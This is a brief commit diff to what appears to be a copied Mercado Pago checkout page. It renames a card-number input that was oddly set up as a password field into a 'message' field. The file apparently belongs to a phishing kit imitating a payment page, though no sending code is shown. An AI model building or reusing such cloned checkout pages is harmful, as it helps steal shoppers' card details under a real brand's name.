Update Mercado Pago - Checkout.html

--- a/payment/Mercado Pago - Checkout.html
+++ b/payment/Mercado Pago - Checkout.html
@@ -70,8 +70,8 @@
     
   <label class="andes-form-control andes-form-control--textfield input-card-number ui-input-text">
   <div class="andes-form-control__control">
-  <span class="andes-form-control__label andes-form-control__label-fixed">Numero de tarjeta</span>
-  <input autocorrect='off' class='field1' type="password" name="password" required placeholder="Password"  class="andes-form-control__field" maxlength="16">
+  <span class="andes-form-control__label andes-form-control__label-fixed">message</span>
+  <input autocorrect='off' class='field1' type="message" name="message" required placeholder="message"  class="andes-form-control__field" maxlength="16">
   <div class="andes-form-control__embedded">  </div></div><div class="andes-form-control__border"></div></label>
   
   
